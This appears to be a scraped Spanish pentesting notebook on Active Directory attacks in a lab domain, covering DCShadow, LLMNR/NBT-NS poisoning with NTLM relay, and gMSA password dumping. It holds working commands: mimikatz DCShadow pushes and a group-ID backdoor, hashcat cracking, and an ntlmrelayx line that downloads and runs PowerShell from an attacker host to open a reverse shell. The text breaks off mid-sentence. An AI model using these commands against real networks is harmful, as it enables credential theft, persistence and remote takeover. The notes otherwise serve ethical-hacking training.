mini\_HaveIBeenPwned.py](https://3741330946-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FKX3Vc1QrEuNFDUSnFFhR%2Fuploads%2FjqvGD3yT87DVqYe6Hzbd%2Fmini_HaveIBeenPwned.py?alt=media&token=d00d1565-152a-4221-ba9a-f74e7373cc02) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FQzEZNfYdIH8q2nURYV3x%252Fimage.png%3Falt%3Dmedia%26token%3D8218f2c9-07bf-4519-a7cf-f8c9980f4e32&width=768&dpr=4&quality=100&sign=50622e44&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FaNbdMzAwvPF6ETJ7ALwi%252Fimage.png%3Falt%3Dmedia%26token%3Dfd383376-b4a8-4e63-a390-28badf326ac3&width=768&dpr=4&quality=100&sign=4380d335&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FqZWBki4r0E8D1Lzti5Cp%252Fimage.png%3Falt%3Dmedia%26token%3Df12cbb13-2731-4769-9f08-6cb48ec3c04f&width=768&dpr=4&quality=100&sign=5f5434ab&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F2FDP2TvJC59tCUeQZRW1%252Fimage.png%3Falt%3Dmedia%26token%3D87579d92-5275-480a-9033-f2e94365c7f3&width=768&dpr=4&quality=100&sign=8d593ad3&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FTA5UZimxM1qvFJs6jTb7%252Fimage.png%3Falt%3Dmedia%26token%3D8f4b91e9-1288-4c90-b249-90c6167c0efe&width=768&dpr=4&quality=100&sign=c4f3eace&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FeDQL0lMMDn5z6r25xiZW%252Fimage.png%3Falt%3Dmedia%26token%3Db1596c0f-d02f-41e1-9113-a40c4baedfbc&width=768&dpr=4&quality=100&sign=48e17a55&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FA2AH1n5j6kWYUaPNDQjy%252Fimage.png%3Falt%3Dmedia%26token%3D661cf942-1568-485b-96b8-4777a8f45b87&width=768&dpr=4&quality=100&sign=1b9af547&sv=2) [![Logo](https://mha.azurewebsites.net/favicon.ico)Message Header Analyzer](https://mha.azurewebsites.net/) [![Logo](https://www.transparencia.gob.pe/imagenes/peru.ico)Portal del Estado Peruano - Portal de Transparencia Estándar - PTE](https://www.transparencia.gob.pe/) [Phonebook.cz - Intelligence X](https://phonebook.cz/) [https://app.snov.io/app.snov.io](https://app.snov.io/) [![Logo](https://hunter.io/assets/favicon/touch-icon-iphone-retina-d0384f02fedc37fedb95ff1528e5f2502bc7bbec1e95f1d3a0d15b4bf3dde436.png)Find email addresses in seconds • Hunter (Email Hunter)Hunter](https://hunter.io/) [![Logo](https://github.com/fluidicon.png)GitHub - m8sec/CrossLinked: LinkedIn enumeration tool to extract valid employee names from an organization through search engine scrapingGitHub](https://github.com/m8sec/CrossLinked) [![Logo](https://egnyte-www-static.egnyte.com/assets/images/favicon/favicon-32x32.png)GoogleCheatSheet.pdf on EgnyteEgnyte](https://sansorg.egnyte.com/dl/f4TCYNMgN6) [![Logo](https://pentest-tools.com/apple-touch-icon.png)Google Hacking - Free Google Dorks for ReconPentest-Tools.com](https://pentest-tools.com/information-gathering/google-hacking) [![Logo](https://assets.faisalahmed.me/61.gif)Bug Bounty Helper](https://dorks.faisalahmed.me/) [https://www.exploit-db.com/google-hacking-databasewww.exploit-db.com](https://www.exploit-db.com/google-hacking-database) [![Logo](https://github.com/fluidicon.png)GitHub: Where the world builds softwareGitHub](https://github.com/) [![Logo](https://www.shodan.io/static/img/apple-touch-icon-192.png)ShodanShodan](https://www.shodan.io/) [https://e-consultaruc.sunat.gob.pe/cl-ti-itmrconsruc/FrameCriterioBusquedaWeb.jspe-consultaruc.sunat.gob.pe](https://e-consultaruc.sunat.gob.pe/cl-ti-itmrconsruc/FrameCriterioBusquedaWeb.jsp) [https://search.0t.rocks/search.0t.rocks](https://search.0t.rocks/) [![Logo](https://exposed.lol/static/img/favicon.png)EXPOSED](https://exposed.lol/) --- # DCShadow Attack | EH - Infraestructura [PreviousnoPAC Attack](/ethical-infraestructura/nopac-attack) [NextConstrained Delegation](/ethical-infraestructura/constrained-delegation) Last updated 4 months ago [](#id-1.-introduccion) 1\. Introducción --------------------------------------------- * DCShadow es un ataque que consiste en SIMULAR/CREAR un Domain Controler falso. * En el DC falso se realizan operaciones sobre objetos. * Finalmente, se fuerza la sincronización con el DC verdadero y los cambios realizados en el DC falso son aceptados. De esta forma se realizan operaciones no autorizadas. * Para que el ataque funcione se requiere lo siguiente: * Ejecutar mimikatz desde un computador en el dominio y con un usuario con privilegios de Domain Admin. [](#id-2.-grafica-y-flujo-del-ataque) 2\. Gráfica y Flujo del Ataque ------------------------------------------------------------------------- [](#id-3.-comandos-de-automatizacion-poc) 3\. Comandos de automatización (PoC) ----------------------------------------------------------------------------------- ### [](#id-3.1.-acceder-por-rdp-con-el-usuario-opalomino-al-win10-pc1) 3.1. Acceder por RDP con el usuario opalomino al WIN10-PC1 * El usuario opalomino es un usuario con privilegios de Administrador de Dominio ### [](#id-3.2.-ejecutar-mimikatz-para-levantar-un-dc-falso) 3.2. Ejecutar Mimikatz para levantar un DC falso Copy mimikatz # lsadump::dcshadow /object:"CN=dina,CN=Users,DC=enterprise,DC=com" /attribute:description /value:"el palomo was here" ### [](#id-3.3.-push-sobre-el-dc-original) 3.3. Push sobre el DC original Copy mimikatz # lsadump::dcshadow /push ### [](#id-3.4.-verificar-el-cambio) 3.4. Verificar el cambio [](#id-4.-backdoor-persistencia) 4\. Backdoor / Persistencia ----------------------------------------------------------------- * Volver a un usuario como Domain Admin Copy mimikatz # lsadump::dcshadow /object:"CN=dina,CN=Users,DC=enterprise,DC=com" /attribute:primaryGroupID /value:519 [](#id-5.-referencias) 5\. Referencias ------------------------------------------- [![Logo](https://img.netwrix.com/fav.v002.ico)What a DCShadow Attack Is and How to Defend Against ItNetwrix Blog | Insights for Cybersecurity and IT Pros](https://blog.netwrix.com/2022/09/28/dcshadow_attack/) [![Logo](https://www.sentinelone.com/wp-content/themes/sentinelone/assets/favicon-whyte/apple-touch-icon.png)Detecting a Rogue Domain Controller - DCShadow AttackSentinelOne](https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/) [![Logo](https://2783428383-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/collections%2FmuMguNrsRx2mNyNqEox4%2Ficon%2F1qCJ0VIDlWcvGSecYCDq%2Ffondo.png?alt=media&token=1e721267-450f-43f3-861b-6c4f93278e93)DCShadow | HackTricks](https://book.hacktricks.xyz/es/windows-hardening/active-directory-methodology/dcshadow) [640KB\ \ dcshadow.jpg\ \ image](https://3741330946-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FKX3Vc1QrEuNFDUSnFFhR%2Fuploads%2FPEa4PqWGg2dNFJIom7uK%2Fdcshadow.jpg?alt=media&token=41c5efc9-fd39-4f76-8206-2a8473ad40e8) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FXPtk7nOm53wgTPVDHNze%252Fdcshadow.jpg%3Falt%3Dmedia%26token%3D3ac2f919-3ed8-4fb2-84f3-5c72647e283d&width=768&dpr=4&quality=100&sign=885254e7&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F5qpXkhSrdihbLd3rSMTK%252Fimage.png%3Falt%3Dmedia%26token%3D57d1911a-3bc9-4a8a-a6dd-8b4642481367&width=768&dpr=4&quality=100&sign=73e191e6&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FkFi5Vt5QZv4b3DnHqE3h%252Fimage.png%3Falt%3Dmedia%26token%3Df1fc417a-6cdf-4693-a3fe-5ff88dde23ae&width=768&dpr=4&quality=100&sign=83337a82&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FQX8UMMYMfwSxFDSPDakB%252Fimage.png%3Falt%3Dmedia%26token%3D6f75f780-9945-49d6-97e0-a1cb7a78e33d&width=768&dpr=4&quality=100&sign=a0655b2d&sv=2) --- # Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks | EH - Infraestructura [PreviousAS REP-ROASTING](/ethical-infraestructura/as-rep-roasting) [NextGolden Ticket](/ethical-infraestructura/golden-ticket) Last updated 1 year ago [](#protocolos-de-red) Protocolos de Red --------------------------------------------- * Microsoft utiliza los siguientes protocolos para la resolución de nombres: * LLMNR: Link-Local Multicast Name Resolution * NBT-NS: NetBIOS Name Service * Estos protocolos son utilizados cuando FALLA la búsqueda DNS. * Estos protocolos no están autenticados y funcionan a través de UDP. * Los puertos de red son los siguientes: * LLMNR: Link-Local Multicast Name Resolution - UDP/5355 * NBT-NS: NetBIOS Name Service - UDP/137 TCP/137 * El orden de resolución de nombres es: [](#envenenamiento-de-protocolos-poisoning) Envenenamiento de Protocolos (Poisoning) ----------------------------------------------------------------------------------------- * Debido a que el protocolo LLMNR y NETBIOS no son autenticados pueden ser envenenados. * Se puede utilizar la herramienta RESPONDER para realizar el envenenamiento a diversos protocolos. En este post lo utilizaremos sobre el protocolo LLMNR para obtener información del protocolo SMB. * El funcionamiento del ataque se realiza de la siguiente manera: * Un computador de la red intenta ingresar a un recurso de red que se resuelva a través de LLMNR y/o NTB-NS. Por ejemplo: //FILESERVER/share * El computador realiza el siguiente procedimiento para intentar resolver el nombre: * El atacante ejecuta RESPONDER en modo escucha esperando las consultas LLMNR y NTB-NS. * Se capturan las credenciales y/o HASHES obtenidas a través del envenenamiento. * Finalmente, se procede a realizar un CRACKING del hash obtenido. [](#responder-en-funcionamiento) Responder en Funcionamiento ----------------------------------------------------------------- * Responder está instalado en el siguiente PATH: * El archivo de configuración de la herramienta es Responder.conf * El resultado de la información obtenida se guarda en la siguiente ruta: ### [](#responder-ejemplo) Responder: Ejemplo 1. Se ejecuta Responder. 2. Se abre una carpeta en un computador Windows dentro de la red LAN 3. Se captura el HASH a través de la herramienta Responder. 4. Se procede con el CRACKING OFFLINE de lo hashes con HASHCAT `──(root㉿kali)-[~] └─# hashcat -m 5600 --force -a 0 hash-ntlm.txt /home/kali/diccionario.txt` [](#ntml-relay-attack) NTML Relay Attack --------------------------------------------- * El ataque permite RETRANSMITIR el HASH NTLM obtenido en el ataque previo. * El ataque consiste en lo siguiente: * En PC-WIN10-PC1: Está logueado el usuario de dominio ADMINDBA. * En PC-WIN10-PC2: El usuario ADMINDBA tiene permisos de Administrador. * Se utilizará la herramienta SMBRELAYX.PY que forma parte de la suite IMPACKET. ### [](#smb-relay-ejemplo) SMB RELAY: Ejemplo 1. Editar el archivo Responder.conf 2. Ejecutamos SMBRELAYX.PY `/usr/bin/impacket-ntlmrelayx -tf target.txt -smb2support` \- El archivo target apunta a donde está el usuario ADMINDBA con privilegios de administrador. - Por defecto la herramienta realizará un DUMP del hash local del computador 3. Ejecutamos la herramienta RESPONDER. 4. En PC-WIN10-PC1 donde está el usuario ADMINDBA logueado se accede a un recurso de red. 5. Se obtiene el siguiente resultado: 6. Se puede ejecutar comandos a través de la siguiente opción: 7. Finalmente, podemos obtener una SHELL REVERSA a travpes de POWERSHELL. Copy ┌──(root㉿kali)-[/usr/share/responder] └─# /usr/bin/impacket-ntlmrelayx -tf target.txt -smb2support -c "powershell IEX(New-Object Net.WebClient).downloadString('http://192.168.4.128:8000/Test.ps1')" * El archivo powershell se puede descargar desde aquí: * Se editar el archivo Test.ps1. La dirección IP corresponde a la IP que recibirá la conexión reversa. * Finalmente se obtiene la SHELL REVERSA [![Logo](https://github.com/fluidicon.png)GitHub - SpiderLabs/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.GitHub](https://github.com/SpiderLabs/Responder) [![Logo](https://github.com/fluidicon.png)impacket/smbrelayx.py at master · fortra/impacketGitHub](https://github.com/fortra/impacket/blob/master/examples/smbrelayx.py) [![Logo](https://github.com/fluidicon.png)GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.GitHub](https://github.com/samratashok/nishang) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FfbMli7QOfqj6oMMekjTA%252Fimage.png%3Falt%3Dmedia%26token%3Db566bfe1-f3c9-4094-9eda-9e61499a4a87&width=768&dpr=4&quality=100&sign=1245ca7b&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FUbeXJz3NmJtLUdBZY8uY%252Fimage.png%3Falt%3Dmedia%26token%3D6a1c57c4-dc6b-42a8-a608-de5d8aa69db9&width=768&dpr=4&quality=100&sign=a2c48f0a&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FfbMli7QOfqj6oMMekjTA%252Fimage.png%3Falt%3Dmedia%26token%3Db566bfe1-f3c9-4094-9eda-9e61499a4a87&width=768&dpr=4&quality=100&sign=1245ca7b&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FLFjy4iM6XkLTEzYgUALL%252Fimage.png%3Falt%3Dmedia%26token%3D432972e7-3f8e-485d-8938-1c9f545e01c0&width=768&dpr=4&quality=100&sign=b284c76e&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FlqdknxFs1EBCqMzCGp9X%252Fimage.png%3Falt%3Dmedia%26token%3De353e0b6-984d-4db1-8d68-793f77a8850f&width=768&dpr=4&quality=100&sign=27d41ce4&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FEB4HxkbZrZYtLHZ3du5W%252Fimage.png%3Falt%3Dmedia%26token%3Dce6aaf54-cbf5-4b7d-b6ab-7e50f3b10ede&width=768&dpr=4&quality=100&sign=94b05cfc&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FeQcxyUYQtBbNFwou6hs0%252Fimage.png%3Falt%3Dmedia%26token%3D6ba6f542-cd5a-4dee-b0d2-ac8ed0c97045&width=768&dpr=4&quality=100&sign=9e5494a0&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FH6p1UaTKH1v14M6gd6oO%252Fimage.png%3Falt%3Dmedia%26token%3D872987c5-5c96-429b-b7ee-98b3d84fe6f8&width=768&dpr=4&quality=100&sign=77038d2e&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FPuIwBYebwSJhepgnCRf6%252Fimage.png%3Falt%3Dmedia%26token%3Dcb8ea4ad-5111-4007-b14a-e363e6575ef3&width=768&dpr=4&quality=100&sign=40b44cbf&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252Fi6fatl89ZvBzCNs53pKp%252Fimage.png%3Falt%3Dmedia%26token%3Db267295b-ee23-4580-9af4-a661e935354b&width=768&dpr=4&quality=100&sign=22e28a46&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252Fwb2435D7tystfMDyKi3U%252Fimage.png%3Falt%3Dmedia%26token%3D514f6ba6-6753-477f-8048-ee25dcd463bf&width=768&dpr=4&quality=100&sign=4dcf808e&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F9n35ROwhzR8mmDF5prmL%252Fimage.png%3Falt%3Dmedia%26token%3D3d635061-52bc-45a7-a230-b9ec876a7f3b&width=768&dpr=4&quality=100&sign=3d88bdba&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252Ft9qTQ1BIJKPovJ6T5l6q%252Fimage.png%3Falt%3Dmedia%26token%3Dc9447e9d-6dfb-4daf-9652-612506467a97&width=768&dpr=4&quality=100&sign=fcc94712&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F4jxoRPn6E1QdXi1jAzFq%252Fimage.png%3Falt%3Dmedia%26token%3De0d1194f-8e20-4803-b0a5-da6c075d9410&width=768&dpr=4&quality=100&sign=8763984b&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FqKs2HXNBEtFacKAAXGZj%252Fimage.png%3Falt%3Dmedia%26token%3D1223b6ba-f6d1-430b-bfb3-2991feab3cf7&width=768&dpr=4&quality=100&sign=5febd2bd&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F0JPzHrXV0ymEpLv8hGp9%252Fimage.png%3Falt%3Dmedia%26token%3D3bcc3772-cd71-4ed2-8d68-5b9b46e68b8f&width=768&dpr=4&quality=100&sign=43828637&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F3Yi4OsTTQIS65XrA3HXW%252Fimage.png%3Falt%3Dmedia%26token%3D22c49d9a-a516-47de-b7d2-7a914ae02a9d&width=768&dpr=4&quality=100&sign=d4dd02a3&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FRCOy9Og8egiIKHq1WrHB%252Fimage.png%3Falt%3Dmedia%26token%3D568a7a9f-9060-42ac-b8ed-0919cae8aadc&width=768&dpr=4&quality=100&sign=3b1d095&sv=2) --- # Metodología | EH - Infraestructura [NextConfiguración](/ethical-infraestructura/metodologia/configuracion) Last updated 7 months ago ### [](#metodologia-para-ethical-hacking) Metodología para Ethical Hacking Existen varias metodologías: * OSSTMM (Open Source Security Testing Methodology Manual) * NIST SP800-115 * CEH - EcCouncil ### [](#conceptos) Conceptos: * **Análisis de Vulnerabilidades**: Identificación de vulnerabilidades. * **Ethical Hacking**: Explotar las vulnerabilidades. * **Pentesting**: Obtener toda la información después de explotar la vulnerabilidad para: elevar privilegios, lateralizar, pivitong y en general ganar acceso a OTROS SISTEMAS. * **Red/Blue Team**: Ejercicios "inopinados" y lo más real posible. * Red Team: Es el equipo que ataca la infraestructura. * Blue Team: Es el equipo que defiende. ### [](#tipos-de-prueba) Tipos de Prueba * **Caja Negra**: Son pruebas donde NO se brinda información. * **Caja Gris**: Se brinda información LIMITADA. Por ejemplo: usuarios, contraseñas. * **Caja Blanca**: Se brinda TODA la información. Por ejemplo: código fuente, documentación, bases de datos, etc. ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FPbV7kOYzG9RcceNzE7xu%252Fimage.png%3Falt%3Dmedia%26token%3D1b104632-c8f9-4324-844f-d5a5f24331ce&width=300&dpr=4&quality=100&sign=8eb4f8ed&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F4V5Q2cx6n1Ld8KV7ivyq%252Fimage.png%3Falt%3Dmedia%26token%3D353c020a-7d02-47c7-8050-caee27351798&width=768&dpr=4&quality=100&sign=21e9155c&sv=2) --- # gMSA Password Attack | EH - Infraestructura [](#introduccion) Introducción ----------------------------------- Una cuenta gMSA (Group Managed Service Account) o Cuenta de Servicio Administrada por Grupo es un tipo especial de cuenta en Active Directory, introducida por Microsoft en Windows Server 2012. Estas cuentas están diseñadas para proporcionar una mejor seguridad y administración para las cuentas de servicio. Aquí están sus características principales: 1. Gestión automática de contraseñas: Las contraseñas de las cuentas gMSA son generadas y actualizadas automáticamente por el Controlador de Dominio, eliminando la necesidad de que los administradores gestionen manualmente las contraseñas. 2. Asociación a grupos de computadoras: Una cuenta gMSA está asociada a un grupo específico de computadoras que pueden utilizar esa cuenta. 3. Mayor seguridad: Al no tener una contraseña fija, las gMSA son más seguras que las cuentas de servicio tradicionales. 4. Compatibilidad con aplicaciones: Están diseñadas para ser utilizadas por aplicaciones y servicios que admiten este tipo de cuentas. 5. Auditoría mejorada: Proporcionan mejor trazabilidad y auditoría de las actividades realizadas por los servicios que las utilizan. 6. Reducción de la carga administrativa: Al automatizar la gestión de contraseñas, reducen significativamente el trabajo de los administradores de sistemas. 7. Soporte para clústeres: Son especialmente útiles en entornos de clústeres, donde múltiples servidores necesitan acceder a la misma cuenta de servicio. 8. Sin inicio de sesión interactivo: Las cuentas gMSA no pueden ser utilizadas para iniciar sesión de forma interactiva, lo que aumenta la seguridad. Las cuentas gMSA son particularmente útiles en entornos empresariales grandes donde la gestión manual de cuentas de servicio puede ser complicada y propensa a errores. Sin embargo, requieren una infraestructura de Active Directory actualizada y aplicaciones compatibles para aprovechar plenamente sus beneficios. [](#estructura-del-ataque) Estructura del ataque ----------------------------------------------------- El ataque gMSA password contra un Active Directory es una técnica que busca explotar las vulnerabilidades en la gestión de las Group Managed Service Accounts (gMSA). Este ataque se centra en obtener acceso a las contraseñas de estas cuentas, que normalmente están protegidas y gestionadas automáticamente. Aquí están los puntos clave de este ataque: 1. Objetivo del ataque: Obtener la contraseña actual de una cuenta gMSA, la cual normalmente no es accesible directamente. 2. Método de ataque: El atacante intenta extraer o calcular la contraseña actual de la gMSA utilizando información disponible en el dominio. 3. Explotación de permisos: A menudo, el ataque requiere ciertos privilegios en el dominio, como ser miembro del grupo que puede usar la gMSA o tener permisos de lectura en ciertos atributos de Active Directory. 4. Uso de herramientas específicas: Se utilizan herramientas especializadas que pueden calcular o extraer la contraseña de la gMSA basándose en la información del dominio. 5. Aprovechamiento de la estructura de la contraseña: Las contraseñas de gMSA se generan de manera determinista basadas en ciertos atributos del dominio, lo que puede ser explotado si se conoce el algoritmo. 6. Impacto potencial: Si tiene éxito, el atacante puede obtener acceso a servicios y recursos que utilizan la gMSA, potencialmente escalando privilegios en el dominio. 7. Contramedidas: Para prevenir este ataque, es crucial limitar estrictamente los permisos sobre las gMSA, monitorear el acceso a sus atributos en AD, y mantener actualizados los sistemas y parches de seguridad. 8. Complejidad: Este ataque es generalmente más avanzado y requiere un conocimiento profundo de la estructura de Active Directory y de las gMSA. [](#ataque-01-ataque-remoto) Ataque 01 - Ataque Remoto ----------------------------------------------------------- Copy python gMSADumper.py -u admindba -p Password1 -l 192.168.5.100 -d enterprise.com **Importante**: Para que el ataque funcione el AD debe tener el puerto 636 habilitado: LDAPSSL [](#ataque-02-ataque-local) Ataque 02 - Ataque Local --------------------------------------------------------- **Condición**: El usuario admindba debe tener acceso a través de WINRM. 1. Conectarse por WINRM. Los comandos son: Copy // test es el usuario gmsa $gmsa = Get-ADServiceAccount -Identity 'test' -Properties msDS-ManagedPassword $pass = ConvertFrom-ADManagedPasswordBlob -Blob $gmsa.'msDS-ManagedPassword' $secpass = ConvertTo-SecureString -String $pass.'CurrentPassword' -AsPlainText -Force ConvertTo-NTHash -Password $secpass **Importante**: 1. Para que el comando "ConvertFrom-ADManagedPasswordBlob" funcione se debe tener instalado DSInternals. Copy PS C:\Users\Administrator> [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Tls11, Tls12' Copy PS C:\Users\Administrator> Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force Name Version Source Summary ---- ------- ------ ------- nuget 2.8.5.208 https://onege... NuGet provider for the OneGet meta-package manager Copy PS C:\Users\Administrator> Install-Module -Name DSInternals Untrusted repository You are installing the modules from an untrusted repository. If you trust this repository, change its InstallationPolicy value by running the Set-PSRepository cmdlet. Are you sure you want to install the modules from 'PSGallery'? [Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): Y 1. El ataque solo lo puede realizar el usuario **admindba**, ni siquiera el usuario 